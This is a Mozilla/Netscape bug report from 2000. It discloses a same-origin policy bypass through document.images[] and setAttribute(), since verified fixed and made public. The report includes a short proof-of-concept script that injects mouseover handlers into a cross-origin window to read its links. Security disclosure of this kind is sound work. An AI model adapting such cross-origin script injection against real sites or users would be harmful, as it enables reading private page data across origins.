Closed Bug 28958 Opened 25 years ago Closed 24 years ago

document.images[] and setAttribute() vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: Fix in hand) 

Subject: 
        document.images[] and setAttribute() vulnerability
   Date: 
        Wed, 23 Feb 2000 15:29:36 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




There is a security vulnerability in document.images[] and
setAttribute() method which allows circumventing the Same Origin
security policy.
The code is:
-----------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
function f()
{
for(i=0;i<a.document.images.length;i++)
 a.document.images[i].setAttribute("onmouseover","alert('The first link
is: '+document.links[0].href)");
}
setTimeout("f()",5000);
</SCRIPT>
-----------------------------------------------
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
Keywords: beta2
Whiteboard: Fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.